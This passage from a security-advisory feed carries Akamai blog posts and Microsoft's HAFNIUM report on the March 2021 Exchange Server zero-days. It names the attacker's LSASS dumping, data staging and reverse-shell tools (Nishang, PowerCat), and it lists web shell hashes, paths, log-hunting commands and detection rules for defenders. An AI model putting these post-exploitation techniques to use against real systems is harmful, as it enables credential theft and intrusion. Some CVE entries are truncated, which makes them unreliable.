deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.\n 3. Customers should investigate for exploitation or indicators of persistence.\n 4. Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.\n\nCompanies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional \"verify, then trust\" model -- which means if someone has the correct user credentials, they are admitted to whichever site, app, or device they are requesting -- ZTNA dictates that users and devices are never trusted and can only access applications and data after passing a secure authentication and authorization process that does not solely rely on user credentials. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, [Microsoft Exchange and Verkada Hacks: Isolate Your Apps &amp; APIs from the Internet Cesspool: Isolate Your Apps and APIs from the Internet Cesspool](<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>).\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:30:00", "type": "akamaiblog", "title": "How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-15T21:41:53", "id": "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/q7n8HyPxlM4/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T22:39:29", "description": "It's been an interesting start to March in terms of public security incidents. \n\nThis month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist \"collective\" calling itself APT-69420 claims to have breached the internal systems of the Silicon Valley firm Verkada. That particular breach has garnered widespread press coverage as the group claims to have gained access to live video feeds from more than 150,000 surveillance cameras. \n\nFor me, both of these incidents -- and the responses from the various impacted firms -- brought to mind what we as an industry have been talking about for a while: [why moats and castles belong in the past](<https://blogs.akamai.com/2017/04/why-moats-and-castles-belong-in-the-past.html>).\n\nFrom my perspective, these incidents represent yet another reason why moving to a Zero Trust security model that leverages a cloud-first approach is the future of security for the majority of us. \n\nWhy? It's pretty simple.\n\nLet's look at the Exchange remote code execution vulnerability first. \n\nMicrosoft strongly urged customers to patch on-premises systems immediately. But, as we all know, patching systems isn't always as easy or quick as it sounds, especially for IT teams that are generally overwhelmed and understaffed. As one would expect, [multiple actors continue to take advantage of unpatched systems to attack organizations with vulnerable on-premises Exchange Servers](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n[](<https://blogs.akamai.com/Miscosoft%20Image%201.png>)\n\nAt Akamai, our threat research team rolled out signatures for our web application firewall (WAF), which can stop potentially malicious payloads targeted at vulnerable Microsoft Exchange servers. In other words, Akamai's WAF can block the malicious payload destined for a potentially unpatched system. Clearly, this does not replace patching in the long run, but can buy precious time for IT teams. \n\nIf you are interested in learning more about Akamai's WAF-related Microsoft Exchange server zero-day mitigations, read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>)\n\nThese incidents also raise the larger question: What should and shouldn't be exposed to the public internet?\n\nThat question takes me back to an appropriately titled Gartner report from 2016 called [\"It's Time to Isolate Your Services From the Internet Cesspool\"](<https://www.gartner.com/en/documents/3463617/it-s-time-to-isolate-your-services-from-the-internet-ces>) that gives some pretty clear guidance on that front. The answer is fairly simple: only expose to the internet what you absolutely have to; and for those services, make sure the appropriate security controls are in place.\n\nThat brings me to the second piece of major news, the Verkada hack. \n\nAs with most breaches, there are still a lot of open questions and conjecture, but what has emerged suggests that [exposing a Jenkins server on the public internet is quite risky](<https://arstechnica.com/information-technology/2021/03/hackers-access-security-cameras-inside-cloudflare-jails-and-hospitals/>). Combine that with the well-understood tactics, techniques, and procedures of most threat actors to obtain system access and use that initial access to pivot to other resources on the network, and you have a recipe for even more risk.\n\nEither way, in both of these cases restricting access to a vulnerable Exchange or Jenkins server through some form of intelligent access control can stop threat actors from reaching resources directly. [I am partial to Zero Trust Network Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>) (ZTNA) approaches that limit who can send malicious payloads targeted at the vulnerable systems. Obviously, this doesn't remove the vulnerability, but restricting access to a potentially vulnerable server through ZTNA can stop any malicious actors from reaching it directly. \n\n[](<https://blogs.akamai.com/Microsoft%20Image2.png>)\n\nIf external actors can't reach a vulnerable system directly, they need to redirect their efforts to reaching it through impersonating an actual end user, which becomes increasingly difficult with the use of contextual, adaptive, and identity aware access controls, such as ZTNA reinforced with FIDO2-compliant multi-factor authentication. Combine those access controls with an inline WAF and a positive picture emerges. Control who has access and inspect traffic flows for anything malicious, even for users who have control.\n\nThe bottom line: Both of these incidents highlight the need to [move to a zero trust-based security model](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp>). \n\nIf you are interested in learning more, I suggest you start with [Akamai Secure Access Service Edge](<https://www.akamai.com/sase>) and our [Enterprise Defender solution](<https://www.akamai.com/us/en/multimedia/documents/product-brief/enterprise-defender-product-brief.pdf>), which combines ZTNA, Secure Web Gateway, Web Application Firewall, and application acceleration as one simple-to-consume security service delivered at the Akamai edge.\n\nIsn't it time to effectively isolate apps and APIs from the internet? \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:15:00", "type": "akamaiblog", "title": "Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-15T21:50:30", "id": "AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/qbi2avdhkGQ/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-24T18:27:13", "description": "The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks. \n\nFor starters, on-premise Microsoft Exchange servers were attacked in droves after a set of zero-day vulnerabilities were discovered, resulting in [widespread infiltration of hundreds of thousands of organizations](<https://www.zdnet.com/article/microsoft-exchange-server-attacks-theyre-being-hacked-faster-than-we-can-count-says-security-company/>). These vulnerabilities allow malicious actors to remotely control machines, read emails, and gain access to internal corporate assets. To illustrate how widespread this attack was, in the two days following the disclosure, Akamai observed [over 290,000 unique attempts to scan and/or exploit these vulnerabilities on our global platform](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Microsoft rapidly issued patches for the vulnerability, but the breadth and scale of the breaches won't be truly known for some time, with some enterprises experiencing advanced persistent threats as a result of the exploit.\n\nAs if this wasn't already bad enough, customers of IT security company F5, which has included almost all of the world's Fortune 50 companies, found themselves rocked with [yet another set of highly severe application vulnerabilities](<https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html>), this time for F5's BIG-IP family of load balancing and security products. These vulnerabilities allow for remote execution of system commands, potentially allowing complete control of the server, interception, and redirection of web traffic, decryption of traffic destined for web servers, and infiltration as a jump host to reach other areas of the network. The National Vulnerability Database ranked these vulnerabilities as critical, some with a [CVSS rating](<https://nvd.nist.gov/vuln-metrics/cvss>) as high as 9.9 out of 10.\n\nBoth of these vulnerabilities, which are actively being exploited by real-world attackers, involve robust highly-utilized systems that have authentication built directly in. So how did this happen?\n\n## Application Authentication\n\nIn both the Microsoft Exchange and F5 BIG-IP products, authentication is required before privileged activities can be performed. While this is an important and required facet of security, many individuals falsely assume that this authentication, which is applied at the application level, provides ample protection.\n\nThis is a misconception, however. If an end user can reach an application such that it prompts them to enter credentials, they have already caused code to execute. This is true regardless of the authentication method or prompt. It does not matter whether the application redirects an end user to an IdP or asks for a username and password directly; the very act of asking for credentials means the application was contacted over the network, code was executed, and a response was tendered to the end user.\n\nAnd this is where the problem lies. Applications are written by human beings, and human beings make mistakes. This is at the heart of the vulnerabilities within Microsoft Exchange and F5 BIG-IP. In both cases, there were incorrect checks against the authentication, which allowed payloads to bypass valid logins and result in exploitation. In other words, the very fact that the systems are reachable is enough to exploit them.\n\nIf you can't trust that the application is implemented perfectly, then what can you do?\n\n## Network Authentication\n\nThe right answer to this problem has been known for quite some time: tie the authentication to not only the application but to the network as well. Zero Trust Network Access is one such method to do this. In a Zero Trust environment, a proxy sits between an enterprise's internal network assets and the users who wish to access them. Basic network communication cannot be established until the end user's identity has been established.\n\nThe authenticators that can be used in a Zero Trust environment tend to be far richer than a VPN, including user identity, groups, device posture, multi-factor authentication (MFA), time of day, location, user and entity behavior analytics (UEBA), client reputation, and more. Only once the proxy has validated the authentication and determined the user is authorized for access does it allow packets to actually reach the application, where it too can then perform additional authentication and authorization checks.\n\nThis has a massive impact on reducing the threat surface of the attacks. In the case of Microsoft Exchange and F5 BIG-IP, it means the vulnerabilities can only be exercised by insiders as opposed to anyone in the world that can reach the machine. This is a drastic improvement.\n\nBut is there anything else we can do?\n\n## It's All About Who and What\n\nReducing the threat surface from the entire world to insiders only is arguably the most impactful step that an enterprise can take toward protecting itself from the above style of vulnerabilities. However, this does not completely eliminate the threat. It simply restricts who can exercise it.\n\nThe problem is that insiders can also be malicious, either directly, or much more often, indirectly through malware installed on their machine or theft of credentials and forged identities by malicious actors. To further protect oneself, a web application firewall (WAF) can help eliminate the risk of what is being sent. Once signatures of the attack are known, a WAF stops even malicious insiders from delivering exploit payloads, further strengthening an enterprise's security posture.\n\nOne may wonder why it's worth having a WAF when patches will eventually eliminate the vulnerability altogether. The answer is in the term eventually. Enterprises can be achingly slow to apply critical patches, having experienced crushing downtimes when poorly written patches have caused outages. In other environments, an enterprise may not even have a full inventory of all of their assets that require patching.\n\nIn these cases, providing a WAF can safely extend the time to patch. Administrators can test the patch, create a staging environment, and deploy over a timeline that meets the business needs, assured that they are safe from exploitation as the WAF is filtering all communications to the vulnerable services.\n\n## A Call to Action\n\nFortunately, Akamai provides a comprehensive suite of products, services, and capabilities that can be used to make your organization safer and more secure.\n\nFirst, our [Akamai Enterprise Application Access](<https://www.akamai.com/us/en/products/security/enterprise-application-access.jsp>) product is a complete Zero Trust Access solution that allows for the closure of all inbound firewall ports and the removal of DMZ applications. Through our set of proxies and rich authentication and authorization primitives, authorized users and devices have full access to only the set of internal applications they need, without additional access to any other assets on the network.\n\nFor employees, these heightened security checks do not mean additional steps or inconvenience when accessing the IT resources they need. In fact, things become simpler and more secure. Native integration with Active Directory, Azure AD, SAML, OIDC, OAuth, and more mean your enterprise can gain the noted security benefits without any changes to your existing application authentication flows.\n\nAdditionally, the inclusion of our [Akamai MFA](<https://www.akamai.com/us/en/products/security/akamai-mfa.jsp>) product extends the noted protections through the use of patent-pending phish-proof multi-factor authentication, allowing end users to use their smartphones to leverage state-of-the-art FIDO2 authentication, the strongest standards-based method currently available. With other solutions, this still requires the use of physical security keys, which not only come at a cost but are also typically perceived as inconvenient and not very popular among employees.\n\nFinally, Akamai's Kona WAF is designed to block not only the full suite of standard attacks web applications receive but also the specific attacks on unpatched Exchange instances noted earlier; for details, please read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>).\n\nAkamai can help you [start your Zero Trust security journey](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp#zero-trust-security-journey>) and move to a least-privilege application access model. [Contact us](<https://www.akamai.com/us/en/contact-us/>) for more information on how we can help you mitigate similar security incidents!\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T14:00:00", "type": "akamaiblog", "title": "Authentication: Lessons Learned from Microsoft Exchange and F5 BIG-IP Hacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-24T17:05:35", "id": "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/iGDirCGcXcg/authentication-lessons-learned-from-microsoft-exchange-and-f5-big-ip-hacks.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-&lt;AppName&gt;VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## 